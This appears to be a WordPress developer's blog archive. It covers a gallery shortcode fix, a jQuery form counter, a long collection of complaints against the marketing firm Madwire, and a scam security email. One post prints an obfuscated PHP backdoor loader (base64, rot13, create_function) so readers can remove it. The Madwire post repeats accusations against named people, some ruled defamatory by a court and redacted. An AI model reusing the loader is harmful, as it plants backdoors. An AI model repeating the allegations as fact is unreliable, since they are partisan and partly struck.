fix: Shortcodes in NextGen Descriptions, Simple PayPal Shopping Cart

NOTE: this will probably work to use shortcodes for any plugin or theme within NextGen Image Descriptions, but this does not make the shortcodes get parsed and work in the lightbox effects. Also, you’ll have to put the gallery template file somewhere where it works. I couldn’t get it to work in my theme’s folder. So this post has it in a plugin’s folder, but you may not be using that plugin (although I guess you could install it, just for the shortcode-enabling bit)

Link to modified gallery-wp-cart.php file which should be used to overwrite the version in /plugins/wordpress-simple-paypal-shopping-cart/lib/.

This was a NIGHTMARE for me to figure out. After some recent software updates, probably most notably, Nextgen Gallery’s big v2 update, my client’s descriptions disappeared from the lightbox effect.

We had things set up so that each image in a gallery represents a product.  Underneath each thumbnail in the gallery is an “add to cart” button created with WordPress Simple Paypal Shopping Cart Plugin. This was done by adding the following syntax to each image’s description in “Manage Galleries:”

Visible human-readable description is here followed by human-friendly price, followed by shortcode contained within SPAN so I could selectively hide the shorcode. $20<span class=”cart”>[(remove this)wp_cart_button name=”Product Name” price=”20.00″(remove this too)]</span>

Then with CSS, captions were hidden from thumbnail view, buttons were un-hidden and styled for thumbnail veiw, lightbox captions were styled and lightbox shortcodes (which just display as the shortcodes, a challenge I’m not up to night now) were hidden via the span.

It worked fine, but after some site maintenance, shit went crazy.  Captions disappeared.  The closest I could get to getting things back was to use “template=caption”  in a legacy Nextgen shortcode, but this did not allow the Cart Buttons to be parsed and render as buttons.

Nextgen says on their site that you can create new gallery templates by adding them to your active theme.  While this may be the case, it wasn’t working for me.

I noticed, by the way, that that span id=”lightbox-image-details-caption” now had style=”display: none; and the span that previously contained the caption was now empty :(

I think having gallery-wp-cart.php in two places (the theme and the plugin) favors the plugin over the theme.  And anyway, the file that came with WordPress Simple Paypal Shopping Cart is out of date, at least as of writing this, 2014-09-28.

So after spinning my wheels for hours and hours, I finally created a hybrid of gallery-caption.php (from nextgen) and gallery-wp-cart.php (from WordPress Simple Paypal Shopping Cart). Link is below and above (zipped file). I used this to replace the plugin’s version.  Of course, this will get overwritten when there’s an update to the plugin.

If you are going to try to use my solution, and you’re working for someone else, I recommend, at the very least editing the cart plugin’s description  to contain a warning not to auto update (in wp_shopping_cart.php).

Here’s the Gallery Template file I made.


A New-ish WordPress Hack

DELETE anything that looks like the below from all your theme files.

$z=get_option(“_transient_feed_fbc2353992919b11fc48934d3e55bd94″); $z=base64_decode(str_rot13($z)); if(strpos($z,”95A5440F”)!==false){ $_z=create_function(“”,$z); @$_z(); }



cForms Character Limit/Counter (without the REGEX thing)

I got quite frustrated trying to find a way to use the regex method of limiting the number of characters in a ‘multiple lines of text’ textarea in cFormsII, and I did not want to bother the awesome people that maintain the cForms homepage, cuz they get harassed enough so I went another route: jQuery.

The main problems I was having was no character count/limit, no way to insert additional HTML into the form and for some reason, when the form field contained the REGEX limit (the normal cForms recommended way), it was causing the form to not allow re-submit after a failed submit.

jQuery is awesome for stuff like this.  I added a script to my footer, next to <?php wp-footer(); ?>, in other words, right before </body>… Also, of course the whole thing needs to be contained inside of <script type=”text/javascript”>and</script> and your site needs to have already loaded jquery.js, probably in the <head> (what site doesn’t these days)

 //this first part ads an additional span, with the class 'remain', colored blue, right before the form field label,
 // which says the max characters allowed... Your selector will most likely be something other than #li--10
 jQuery( '#li--10>label' ).append( '<br><span class="remain" style="color:blue;">200</span> <span>characters remaining</span>');
 // this part counts and limits the characters
 // notice my selector is for an element with id="#cf_field_10" ...Yours will likely be different
 jQuery('#cf_field_10').keyup(function () {
 // the maximum characters you want to allow
 var maxchars = 200;
 var tlength = jQuery(this).val().length;
 jQuery(this).val(jQuery(this).val().substring(0, maxchars));
 var tlength = jQuery(this).val().length;
 remain = maxchars - parseInt(tlength);
// this final part rewrites the contents of the span.remain to how many characters are remaining as the user types
// Again, the selecter needs to be changed to fit your needs


I may have messed up with my commenting syntax so I’ll paste the whole thing uninterrupted below.

Also, obviously, you have to be dead-on with your class/id selectors.

jQuery( '#li--10>label' ).append( '<br><span class="remain" style="color:blue;">200</span> <span>characters remaining</span>');
 jQuery('#cf_field_10').keyup(function () {
 var maxchars = 200;
 var tlength = jQuery(this).val().length;
 jQuery(this).val(jQuery(this).val().substring(0, maxchars));
 var tlength = jQuery(this).val().length;
 remain = maxchars - parseInt(tlength);

WARNING: MADWire Media, Marketing 360: Behind the veil of SEO and Astroturf

To Bluehost staff and legal dept: Please look closely at the specifics of any court orders before assuming that this content is actually not compliant with any documents sent by parties wishing to have this content removed from the web. I have carefully complied, line-by-line, with all rulings. Thanks.

Jump to original Madwire 360 / Marketing360 reviews post below

Visit the unlisted/hidden Madwire / Marketing 360 Yelp! page here

Jump to the comments section of this post

I’m back! And I’m in total compliance. :)
UPDATE 2015-02-08: So apparently, Madwire was able to get my entire hosting account taken down with a court order resulting from a defamation claim. But this post will return, albeit slightly altered to protect my hosting account from being shut down again.
In the meantime, the court ruling contains all the content in question, including all the Madwire Reviews and Madwire Complaints and there’s a copy of it here: (it takes a few minutes to load because it’s around 6MB and 60 pages)
Also, notice: the Affidavit of Diligent Search, mentioned on page 2, is conspicuously missing from the evidence. I wonder if that was an accident. I think not.
To Madwire: just let it slide! Everytime I update the content here, I move up in search results! It’s called the Streisand Effect:
And frankly, I’m sick of this post and having to keep changing it after account suspensions (I think this the 4th time!). But I wont go dark. It’s a matter of principle.
To anyone wishing to read my post as it appeared in December of 2014, including the comments, it’s stored at the WayBack Machine:
NOPE! this has been taken down :)
Meanwhile, I must disable comments on this post for the moment, while I remove some content ruled by a Florida court to be defamatory.
[2015-02-25: COMMENTS ARE BACK!]
But feel free to send me a message via my contact form:
When you see XXXXX stuff, it’s words I needed to delete from the below content in order to be compliant with the court order.
[update 2015-01-11] I heard through the internet that Madwire is no longer using a non-disparagement bit in their standard contract.  This is good news if it’s true, but I have no way of knowing for sure if it is true.  So if you have any info on this, please comment!  This post is here to help other people.  So if you can help me keep the info up to date, since I have great SEO power concerning Madwire, you will help other people.  Please do comment. Is this real? It’s a link about madwire’s change of policy. Thanks, everyone, for contributing. We may be making a difference here!
[update 2014-09-26] Madwire has appeared to have filed, in a Florida court, a “Complaint for Declaratory Judgement,” against an anonymous person whom, according to the document, HERE (a PDF) is one of my my commenters below. This appears to be a way that Madwire can get Google and other search engines to un-index this blog post, Madwire’s Yelp! page and a few other search results where this anonymous person has posted.  So apparently, one of my commenters is the defendant known as “John Doe 1” in the filing (Madwire is referred to as the “Plaintiff”).  And I just noticed that Madwire’s Yelp! page suddenly has a meta noindex tag (<meta name=”robots” content=”noindex”>) on it and no longer comes up in Google search results for ‘Madwire Reviews.’ So I guess Yelp! is cooperating with Madwire for whatever reason.  I’ve always had pretty positive feelings about Yelp! despite all the recent negative hype about them, but if they’re willing to hide negative reviews, it certainly decreases their value as a consumer awareness product.  Also, I was assuming that at some point Madwire would contact me or at least post a comment on this post, but so far it appears that they’d rather try to control their reputation through back channels.  Interesting.  To Madwire: I know you guys are looking at this.  Don’t you have anything to say?
[update 2014-06-14:] My site has been taken down again over this post. This time it was that sent my hosting company a DMCA Takedown.  Their claim is that my ‘fair use’ quotation of negative Madwire reviews from their site (which contained attribution) was a copyright infringement!  So I had to remove several negative reviews/stories concerning madwire.  To the next reviews site considering sending a takedown or threat: you are only making this post more visible! Every time it’s edited/updated, it gains value in google serps.
[edit 2014-05-07:]Pissed Consumer sent my hosting company a DMCA takedown notice for this post, due to me quoting negative reviews for Madwire. I’m pretty sure this post is fair use, but my hosting company wont stick up for me  so I had to delete the pissedconsumer reviews in order to get my site back online.  I’ve linked to the originals.  Keep in mind, original bad reviews on are often hidden on the page  and you have to click ‘read the complaint’ to see what you’re looking for.

Original post starts here.

The other day I posted about a friend’s personal experience with MADWIRE, which was horrible to say the least.

I’ve become kind of fascinated by how well this company appears to have created a facade of positive reviews and press, making them seem like a great company to hire.

It’s actually quite difficult to find anyone out there saying anything bad about them, which is a bit suspicious (even the companies I love the best are getting flamed occasionally).  So I’ve been doing some deep googling and I’ve found a lot of stuff that not only sounds more credible and like real people wrote it, but that’s also totally consistent with my experience.

So let the SEO battle begin!  I have great Google mojo with my blog.  And my goal here is to make the world-wide neighborhood a better, safer place.  So here is a compilation of what I’ve found about Madwire that may not be so easy for most people to find, since the search results for things like “madwire reviews” and even “madwire negative reviews” are so cluttered with astroturf.

From the Madwire / Marketing360 Better Business Bureau pages:

Complaint #1: 10/10/2013

Complaint: We paid for two months of Search Engine Optimization & AdWords for our company website through Madwire Media. We never reached the top of the search engines, we received 1 potential customer who filled out our “Contact Us” form, that was it. We paid $750 a month for a total of $1450.00 plus Madwire has tried to pull more money out of our account without authorization. They have added all these additional fees and now are threatening to take us to collections. They promised us a “free” website, they put it up for us but once we cancelled our marketing through them, they posted our website as “ACCOUNT SUSPENDED” which reflected horribly and lost us potential customers from consumers that were directed to our site through our own advertising means. We called them and asked them to put the website back up but they said they wouldn’t unless we paid for the hosting through them but it was a ridiculous amount. The website was supposed to belong to us but they wouldn’t give it to us without paying for their hosting (we already have hosting through someone else). We were offered so much and received nothing but headaches.

Desired Settlement: My desired settlement would be a refund of all money paid, $1450. They didn’t deliver on ANY of their promises. They said we would be on the top of the internet searches, which didn’t happen.Also, we didn’t get to keep the website. We were much better off than before we ever started with Madwire. From what I have read on the internet, we are not the only company that Madwire has scammed. Since internet marketing is so vague, they are able to take advantage of many consumers.

Business Response: Attached is the contract for reference and a receipt of refund. I talked with the client about the contract and services that we provided. We have already made a refund in the amount of $720.00 and we are not moving forward with collections on the remaining part of the contract.

Business Response: An email was sent to ‘*********************’ on 8/21 outlining the details of the contract as well as additional. Also an email was forwarded to ****************** on 8/23.

Consumer Response: Complaint: *******

I am rejecting this response because: they did NOT give me a refund, they just didn’t charge me after I cancelled my account. It’s not that I MISUNDERSTOOD anything (like Jerry’s letter refers), it is that they are rude, did nothing with all the money we gave them and used our “credits” on what? We don’t know! They are a scam and I am demanding full refund. I will keep  on warning other potential customers  about their misdeeds b/c no one deserves to lose $1500 on absolutely nothing, especially when you are a small business, like us.


******** ******

Business Response:
That should do it. One is the contract which speaks to what the consumer was complaining about. All of the information is in there. And the other is an invoice for a refund. This client signed 6 month contract to which we were going to send to collections for early cancellation 2 months in on the contract. Upon receiving the email they filed a complaint with the BBB. In addition we invested $3K dollars of time on a website as part of the agreement. Outlined within the contract it talks about early cancellation with the option of hosting. They disregarded all emails. We took the site down that we own for nonpayment. Not only did we not pursue collections for breach of contract after speaking with ******** we also gave them a refund. It is unfortunate how this process works.

15 Day Collection Letter sent 7/31/13
30 Day Collection Letter sent 8/15/2013

If you have any other questions please feel free to reach out to me.


BBB’s Final Determination: Business offered a resolution. Consumer did not pursue further with BBB and the matter was assumed to be resolved

Complaint #2: 9/16/2013

Complaint: In June of 2013, Madwire Media Reviews contacted me and performed high pressure sales tactics to get me to sign a contract with them. They asked me to give them a large sum of money to start the campaign, which included web design, marketing, seo, and pay per click ads. They made all kinds of promises to which they were not able to hold up to. They promised a good web design and I get a mediocre, at best, design. Their site is beautiful and they said mine would be similar. They lied. They also told me that I would have 100% control of my website and be able to host it on my own server. Another lie. They have control of my website and I can’t make changes because I can’t access the backend. Madwire Media promised me 15-20 calls per day, based on my budget and the keywords targeting for my niche. Another lie. My campaign has been running for over two months and I have received two calls in that time period. Once call I actually booked the job, a $60 job, 45 miles out of my territory. I did the job anyway because my business, my name, and my reputation are at stake. They filled me full of their lies and promises in order to get me sign a contract and give them my payment info. I have done one job in the two months since my campaign started with Madwire Media and when I asked for a refund, they refused. They are not familiar with my industry and are targeting the wrong keywords that aren’t remotely targeted to my industry and they are charging me a premium rate and expect me to keep paying them $2500 per month for services NOT rendered. This fraudulent company needs to be exposed for who they are.

Desired Settlement: I want 100% of my money back. In my business, if a customer is not happy with the work, I redo it for free. If they are still not happy, I refund their money because my reputation is at stake. They promised me I could get my money back yet they refused to refund it when I asked.

BBB’s Final Determination: Consumer accepted resolution offered by the business.

Complaint #3: 9/5/2013

Complaint: I was told that there was NO contracts by several people, several different times before starting my marketing and web design with Madwire Media. **** ******** and ******* ***** both had stated that there is no contracts, until we no longer wanted to use there services after three months of very poor results and NO service. They told us one thing and had us sign documents that were supposedly forms that gave them permission to edit and change our current webpage, little did we know in the small print they lock you into a 6 month contract. This is the most dishonest and rude company that I have ever come across. We would like this matter resolved before we have to hand things over to our lawyers. Please Advise

Desired Settlement: I would like this to be resolved quickly and professionally, I would like for the remaining time and money in our contract to be wiped clear and the harassing phone calls and emails to STOP. I cant believe that there are companies out there like this that LIE and DECIEVE people to make a living.

Business Response: I spoke with ****** and addressed the concerns over the contract and client was satisfied.

BBB’s Final Determination: Business offered a resolution. Consumer did not pursue further with BBB and the matter was assumed to be resolved

Now on to Yelp! where MADWire currently has ONLY negative reviews [2014-10-07: this has changed. Now Madwire has one star on yelp but yelp appears to have cooperated with Madwire in burrying their page. Yelp put a noindex tag on Madwire’s one-star page so it wont show up in search results]:

Patty S.
Fort Collins, CO

Just the fact that another reviewer is saying “I’ don’t know what this guy is talking about” and then you can’t find that review gives you an indication of how many people are not happy with XXXX XXXXXXX XXXX XXXXXXXXXXXX XXX XXXXXXXXXXXXXX XXX XXX XXXX. Once they have your XXXXXX XXXX – XXX XXX XXXXXXXX XX X XXXXXXX XXXXX. XXX XXXXX XXXX XXXXX XXXXXXXX XX XXXXXX XXXXXXX. it is nice looking with great images and graphics but no one can find it. XXXX XXXX X XXXX XXXX XXXXX XXXXXXXXXXXXX XXXXXX XXXXX XXXXXX XXX…..and i suspect many bad reviews have been deleted here because they are misssing from here…….what does that tell you? Yelp took money to get those taken off…….hmmm let’s see how long this review lasts….

Comment from Jerry K. of Madwire Media
Business Owner 8/28/2013 I can’t find your account as doing business with us. Please contact me so that I can take care of… Read more

Joe S.
Huntington Beach, CAJoe S.
Damn I just spent 20 minutes on the phone with Marketing 360 the salesman had all the answers and only wanted $ 2500.00 per month to start? But promised first page placement so I just goggled SEO companies in Denver and guess what there not even on the first page! So I inform the salesman of my search result and he informs me that there parent company in Madwire Media and sure enough they show-up on the 2nd page with all these wonderful Yelp reviews.

Looks like Yelp really saved me time and money, Thanks

A’ngela S.
Gilbert, AZ
hare review
A’ngela S.
BUYER BEWARE!!! I am not kidding you, if you choose to use MadWire360 or Mad wire media or whatever they go by (hint it will have 360 in it somewhere) You are XXXXXXXXX XXXXX XXXXX XX XXX XXXX!! They know how to market their site and unfortunately the talent ends there.. After they smooth talk you into their wonderful service and pass you off to some “Specialist” SEO person, you become just another credit card paying their overpriced fees.. I was with them 3 months and not one lead!!! i spent over 7k and got zip from it!! All i can say is stay away and remember, Pay per click is cheaper than these guys and SEO just means blog on your own site!! Save your cash…

Good Luck
AZ. UnHappy Sucker..

Randy W.
Houston, TX
hare review
Randy W.
STOP!! DON’T USE THIS COMPANY!!! I don’t want anybody to have to go through what I went through. Bottom line. This company will take your money & never do the service. XXXXXXXXX. XXXX XXXXXXXXXXXXX. Can’t created a logo or design. They always want money up front. Don’t ever pay anybody up front. This company is all about sales . The Company is XXXXXXXXXt, full of fast talking salesmen, very expensive and doesn’t deliver the product. BUYER BEWARE!!!!!!!

John G.
Fort Collins, COJohn G.
When it comes to SEO it doesn’t get much worse than MadWire Media! XXXX XXX XX XXX XXXX XXXX XXXXXXX XXXXX XXXXXXXX XX XXXX XXX XXXXXXX XXXX XXXXXXXX XX XXXXXXXXXX. Not only that, I had previously left a review on their Google listing along with close to 10 other dissatisfied customers and their listing has seemed to magically disappear along with all of the negative reviews. They obviously try their hardest to hide how bad they suck. I couldn’t seem to find any other SEO companies that had to do such things. These guys are bottom of the barrel! They provide unnecessary services and XXXX XXXXXXXXXXX XXXXXXXXXXXXX or they just don’t care about their clients. Whichever it is, it would be wise to steer clear of this company.


Comment from Jerry K. of Madwire Media
Business Owner 2/26/2014 FAKE REVIEW! John Gotti is deceased. This is not a customer nor have we ever done business with John… Read more

Charles D.
Junction City, ORCharles D.
Just when I thought all my issues with Madwire were well behind, I got rid of them over a year ago, they recently started billing my card for someone else’s website! It’s pretty scary that they have kept my credit card information on file well over a year after firing them. Not only that, the billing information is now completely different from when we used them, so obviously they don’t even bother with AVS. I guess why would you bother when I’m pretty sure keeping actively old clients’ card info on file if probably illegal and definitely unethical. The fact that they are so XXXXXXXXXXX that they start to bill me instead of a competitor’s account is absolutely ridiculous.

Originally we had Madwire design a logo, website, and manage some seo work. Problems started from the start. They could never get the logo right and I ended up having to hire someone else to provide custom artwork to be used in the logo. For the amount I was paying them for logo design I expected custom and original work. What I received was below par with no effort or creativity behind it. It was as if I hired one of the $4 an hour guys off oDesk but at 20 times the cost.

Now when it came to the website I was already pretty leary of them from the logo design part of the package. The beginning part of the web design was a complete nightmare. The project manager wouldn’t even respond to my requests or questions. I had to contact the supervisor and complain. I was assigned a new project manager to take over the design, or lack thereof. As a side note, the previous project manager is still employed there. The new project manager handled everything much better, however they really pumped the site out quickly due to the job being way behind and there were little errors I had to pester them about to get fixed.

The next disaster came their SEO package. When we signed up for all of this work to be done it was actually an SEO package. When the site was up and running they said they no longer do that and it is now a Madnoodle package where you are listed and gift cards go up for penny auction. Now, SEO-wise this did nothing for our website. This really didn’t even help sales either. We would pay them, they would buy these gift cards from us to post on their Madnoodle site, and then customers would use the gift cards to buy products on our site. It was usually the same people who would buy these gift cards so no new customers were being attracted. Plus these same customers haven’t returned after using these gift cards that we basically bought for them. I should also note the penny auctions were a giant fail and they no longer do this.

My advice is to steer clear of this company. If you don’t you will definitely regret it! Just when I thought all our problems with them were over with… Hope you enjoy the chargeback fees!

Edit 2/14/14: These jerks still have not completely removed my information! I still get invoice emails monthly for their crappy plugins I don’t use. Granted, the invoices are for $0.00, but just stop! I’ve already asked for our information to be completely removed but of course they can’t comply.

To touch on the management responses on some of these reviews (Boo hoo hoo Yelp is being mean to us, these reviews are fake, blah, blah blah). How about you actually listen and fix your company instead of complaining? These negative reviews are sticking because more negatives come from real Yelp accounts, compared to the many positives that are from accounts who have only reviewed Madwire and then never logged in again. Which ones do you think look fake to Yelp? Oh, and just because someone has a fake name doesn’t mean their review is fake either.

Holli W.
Charlotte, NCHolli W.
Worst business decision I’ve ever made. DO NOT USE THEM! They will sell you and do a great job selling you. XX XX XXX XXXX. They are hard to work with, never responding, never making changes. It took WEEKS for them to make ONE small edit. They say they will create banners for your website, they are ugly and horrible. I even sent them pictures of what I liked. I finally had to pay someone to do it right. So much money wasted.

Comment from Jerry K. of Madwire Media
Business Owner 2/26/2014 I can’t find your account as doing business with us. Please contact me so that I can take care of… Read more

Ekaterina B.
San Jose, CAEkaterina B.
I agree with the review that said “$5,000, and not a single client.” This is how I felt when I was using this company. It is true that they XXXXXXXXXXX XXX XXXXXXXXXXXX. When I finally questioned them why I only got ONE client in 3 months, they said “well, lets try another thing.” I am not paying for trial and error. I pay them to know what they are doing. Horrible and XXXXXXXXX.

Michael G.
Brentwood, CA
hare review
Michael G.
First to Review
Working with Madwire has been one of our companies biggest mistakes! It has been over a year and a half and we still do not have a finished product. We have gone through 3 programmers and it seems like they just keep wasting our marketing departments time. We spent a significant amount of money and expected a certain amount of service. They have not delivered. I would not recommend them to my worst enemy. The frustration has built up to the point where we want to jump ship and get our money back.Comment from Jerry K. of Madwire Media
Business Owner 2/26/2014 Please contact me so that I can take care of the situation. I can’t find your account as doing… Read more

From (apparently madwire’s sales team targets people’s carpet cleaning business?)


Attention fellow carpet cleaners. I am posting this to warn everyone of a XXXX being pulled by Madwire Media. I posted a while back, asking if anyone had any experience with them. I didn’t receive very much info so I assumed they were legit. I should have done more research and I didn’t, and now I’m paying for it. So, I am here to expose these XXXXXX and make sure none of you get XXXXXX XXX. Please watch my videos, subscribe, and share so that we can expose these XXXXXX and hopefully prevent anyone else from making the same mistake I did and losing their entire business to XXXXXXXXXXXX XXX XXXXXXXXX companies like Madwire Media. I will not stand idly by as they XXX people off and are not held accountable for it. In my business, if a customer is not happy with the work performed, I will redo it at no charge. If they are still not happy, I will refund their money. Why? Because my name, my business, and my reputation are at stake and I don’t want any of it tarnished over a few dollars. Madwire Media does not feel the same. They think it’s ok to XXXXX XXXX XXXXX XXXXXXXXXXXXXX. XXXX XXXXX XXX XX XX XXX, as long as you get the sale. Please, I ask all of you to help with my plight. I may go out of business before I get soon but if I do, I will take the ones responsible with me and I will make sure they can’t XXXXX XXXX XXXXXX XXXX. Please go to and watch my video directed at you, my peers. Also, you can go here and if you don’t mind, please leave a comment on the pages. Your help in this matter is greatly appreciated and I hope I am able to dig myself out of this hole.

Thanks to all.

Read more:
Follow us: @truckmountforum on Twitter | truckmountforum on Facebook



Took my entire advertising budget and single handedly almost bankrupt me.

On May 28th, Karen Brennan with Madwire Media sent me an email but claimed to be from Now this is one of many of their niche scam sites that they have. Over the course of a month she called and called and called. Finally I decided to listen to her and what she told me sounded amazing. She made all kinds of promises about me getting 15-20 calls per day with their marketing and seo. Well I was just starting a business and decided to go with Madwire Media because I simply didn’t have time to go out and actually do the work I needed to do on top of trying to market and advertise. Karen told me that based on the amount of monthly Google searches for my keywords, I would get 15-20 calls per day and I figured I should at least book 2-3 of them. So I sent them a large some of money, my entire advertising budget based on the promises made.
Fast forward to the date of this report. My campaign has been running for over 2 months now. I got one call in 2 months and it was a $60 job, 45 miles from me. They are targeting niche long tail keywords that are barely related to my industry and get very few searches. My seo campaign is horrible. They have control of my website and can lock me out at any time. XXXX XXX XXXXXX XXXX XXXXXXXXX XX XXXX.
Now in the meantime, I have had my phones turned off and I literally cannot pay my bills. I gave them my entire advertising budget because they promised me a big jumpstart in business and promised I would be busy. XXXXX XXX XXXXX XXX XXXXXXX that do NOT know what they are doing,One thing they should have thought about before XXXXXXXXX XX XXXXX and destroying my business…… I was an seo guy for 7 years, I am a single father with 3 children and this is my lively hood. I put my entire savings into my idea and they single handedly destroyed it. So, I have made it my mission to make sure they don’t XXX anyone else off. I am broke, getting ready to have equipment repossessed if I can’t sell something to make the payment, I have resorted to applying for emergency food stamps to feed my children until I can recoop something or until my seo efforts pay off.
I have asked them for a refund several times and they have refused, therefore, I am going to make sure they never steal from another company or person that needs seo work or internet marketing services.
Madwire Media has gone around to all these review sites including ripoff report and have posted fake positive reviews because of all the negative reviews they are receiving. They are paying these companies like yelp and ripoff report to remove negative reviews so they can keep their Madwire Media Review XXXXX up.They XXXXXXXXX my business, I have nothing left to lose. I will make it my plight in life to shut these XXXXXXXXX down. I hope that Scam Group will help shut these guys down before before someone else loses their life savings to these XXXX artists. XXXXXXX XXXXX XXX XXXXXXXX XXX XXXX XXXX XXXX XXXXXX XXXX XXX. I will not sit by idly and let them XXXXX from others.

From a comment on one of MADWire’s own YouTube videos 

Be very careful about using Madwire Media. We spent over $3k with them and didnt get 1 single client. Our website had images missing and took 7 weeks to complete rather then the 14 days we were told. If you do want to use them make sure you record every telephone conversation you have with them and get everything the sales person tells you in writing!! Do your research before using Madwire Media! There appears to be a consistantly to the negitive feedback which tells its own story!!

There were similar testimonials on some other youtube videos I found last night, but they’ve been deleted.

Now on to

It seems that when you get a negative review on, you can pay to have it covered up!  For instance, with Madwire, if you search for “madwire reviews” you certainly find ripoffreport, but the titles are negative and review copy is a boilerplate positive thing put there by ripoffreport!  Dubious.  I finally found a few of the original bad reviews at ripoffreport


[redacted! ripoffreport sent my hosting a copyright infringement takedown notice because I quoted their site]


[redacted! ripoffreport sent my hosting a copyright infringement takedown notice because I quoted their site]

from, also highly astroturfed but there’s stuff there if you dig

August, 20xx

HERE is the original Negative Review of Madwire.  You must click on “Read the Complaint” [content removed due to copyright infringement claim by pissed consumer sent to my hosting compnay]

march 6 20xx

HERE is the original Testimonial about Madwire / Marketing 360.  You must click on “Read the Complaint” [content removed due to copyright infringement claim by pissed consumer sent to my hosting compnay] 

Jan 29, 20xx

[content removed due to copyright infringement claim by pissed consumer sent to my hosting compnay] 

March 15, 2012

HERE is the original Customer Complaint about Madwire / Marketing360.  You must click on “Read the Complaint”
[content removed due to copyright infringement claim by pissed consumer sent to my hosting compnay]

March 1, 2013

HERE is the original Customer Complaint about Madwire / Marketing 360.  You must click on “Read the Complaint” [content removed due to copyright infringement claim by pissed consumer sent to my hosting compnay]

January 29, 2013

HERE is the original Customer Complaint about Madwire / Marketing360.  You must click on “Read the Complaint” [content removed due to copyright infringement claim by pissed consumer sent to my hosting compnay]

It’s me again.  I have stuff to do today so I’m going to stop for now.  You get the idea.  Maybe I’ll add more later.


[update 2014-10-01]the following is a list of other domains that appear to associated with Madwire. If it’s the same people, I don’t see any reason why there’s not plenty of love to go around. It is ‘Loveland, Colorado; after all
    html title: #1 Bigcommerce Marketing Platform | Bigcommerce Templates & Design
    Daily visitors (according to 1 643
    Keywords:Big Commerce, bigcommerce, marketing 360, bigcommerce seo, marketing360
    html title: eCommerce Marketing Services – eCommerce Software & Website Templates
    Daily visitors (according to 1 186
    Keywords:ecommerce 360, ecommercemarketing360 review, ecommerce360, ecommercemarketing360 scam, free ecommerce store mockup
    html title: Login – Marketing 360®
    Daily visitors (according to 686
    html title: Contractor Marketing, Leads for Contractors – Websites & Contracting Advertising Services
    Daily visitors (according to 534
    Keywords:construction website templates, contractor marketing, ads website template, free building contractor website templates, free contractor website templates
    html title: Business Websites 360™ – Best Business Website Templates & Designs
    Daily visitors (according to 534
    Keywords:business website templates, business marketing websites, top business websites, marketing website templates, mad360
    html title: Mad360 – The Leader in small business inbound marketing
    Daily visitors (according to 534
    Keywords:360 marketing, marketing 360, marketing360, mad 360, mad360
    html title: WordPress Theme Designer | Custom WordPress Theme Designers
    Daily visitors (according to 534
    Keywords:custom wordpress theme design, wordpress theme designer, theme designer, custom wordpress theme designer, wordpress transportation theme
    html title: Chiropractic Marketing 360 | Chiropractic Websites | Chiropractic Advertising | Chiropractic Website Templates
    Daily visitors (according to 534
    Keywords:Chiropractic marketing, chiropractor marketing, 360 marketing, marketing 360, marketing360
    html title: Dentist Marketing 360 – Dentist Websites | Dentist Advertising | Dentist Website Templates
    Daily visitors (according to 89
    Keywords:dentist marketing, dental website templates, dentist website template, dentist website templates, template dentist free
    html title: Medical Marketing 360 – Medical Websites | Medical Advertising | Medical Website Templates
    Daily visitors (according to 89
    Keywords:medical website design, medical website design templates, healthcare marketing 360, doctormarketing360, youmedical template
The Registrant of all these domains appears to be John Kellogg who is also the CFO of a company called Traders Network or which shares the same address as Madwire. I’m not sure but John Kellogg may be the same person as Joe Kellogg and/or JB Kellogg.
A few extra search terms for Marketing360
  • Natural Listing Ads
  • Top Placement Ads
  • Retargeting Ads
  • UXi Websites

Before Hiring MADWIRE, Be Warned

OK, so I have no doubt that there are plenty of honest and capable people at MadWire, or MadWireMedia, or MadWire 360 or whatever.

But there are some things you should be aware of before signing a contract with them.  I’m writing this because in searching for anything negative about Madwire, I’ve found that they have completely bombed google.  And meanwhile, they are buying Pay Per Click Ads like nobody’s business, so it’s really hard to see through their promotional efforts, which I must admit, are pretty thorough.  But such a substantial publicity push serves as what is essentially a reality distortion field for you and me–The kind that would make us think that Godaddy is actually the best choice for shared Linux hosting, which I think most developers would agree, it isn’t.

So here’s the thing I want to warn you about.  It is quite possible, in my opinion, according to what I’ve seen, that if you do not carefully negotiate your contract with Madwire, you will find yourself locked into a perpetual hosting agreement in the ballpark of $50/month.


The Design work you hired them to do, they (or their legal representation) will claim is their intellectual property.  So you can walk away from a hosting agreement that’s about 8-10 times more expensive than it should be, and have nothing, or continue to throw an unnecessary $30=$40 or more dollars into the wind every month, essentially FOREVER.

In other words, what someone I know was lead to sign off on, according to someone at Madwire or claiming to legally represent them, was not Work-for-hire.

Good Web Developers (I include myself in this category, thank you) working for individuals and small organizations understand that the client is best suited if they always have as many options as possible.  Those options necessarily include the ability to hire someone else at any time and/or do other things with the hosting they are paying for.

This means:

  • whenever possible, use non-proprietary code such as WordPress, Drupal, Joomla, Concrete5 Etc (making easier to hire from a pool of other developers out there)
  • The Client should own their own Domain Registration
  • The Client should own their own Hosting Account.
  • All design work should be work-for-hire.  Ownership of the design needs to be the client’s
  • All build work should be work-for-hire.

My understanding is, according at least to one contract I know of with Madwire, their model is that you “rent” their design and development work, contingent on whether or not you continue to pay them way too much every month for hosting that you do not actually have the freedom to use.

And if you want out?  Well, as far as I know, they will then want to be paid off for the release of rights to what should have been work for hire in the first place.

So please, take these things into consideration before hiring Madwire or anyone else including ongoing hosting charges as part of the proposal.



Dubious Solicitation Regarding WP Security: Clearwater Security Research Lab

Dear [your name here],

How are you? I am Fahad Hassen, a php developer from Clearwater working
with website security. I am writing to ask whether you are aware that your
domain configuration has serious security issues which lets anyone use your
email address without your authorization?

Just to prove this to you, I can send an email to you from “your email
address itself”. Do you want me to send an email to you from your mailbox
itself, so you can see the problem?

I found your website while researching the websites using the wp-e-commerce
plugin, as part of a security research to strengthen the plugin’s security.
I also found that your website’s wordpress files are not protected, which
means by right clicking and checking the source code of the website, almost
anybody can figure out the framework you are using (wordpress), its
version, the themes and plugins you are using etc. A competitor or anybody
interested in your site can easily duplicate your site since the whole
structure of your site is exposed. Further, since wordpress is very prone
to hacking and hackers target the open URLs of the system such as wp-admin
and wp-login and other common files, your site is always under the risk of
attack. To overcome this, you will need to takeaway all the traces of a
standard wordpress site, so no attacks/hacking will work on your site. For
anybody viewing the “source”, all they will see is nice and clean HTML and
no traces of wordpress.

I am sure you understand the concerns I have raised, and I can fix these
for you for a very modest fee if you wish. Please let me know.

Thank You and Regards,

Fahad Hassen
Senior PHP Developer
+1 727 474 1044

Clickingz Security Research Lab, Clearwater FL. 33760

Siktim Ebeniii/Hacked By NmDumuT WordPress Hack… Jumpline Etc

By googling the code, I was able to find many other sites with the same problem (below)…
The vast majority of these are on servers at either

Jumpline resides at, as far as I can tell.  Perhaps they are a reseller or something.

This is malware.
And from what I can tell, what it is attempting to do is this:
or this

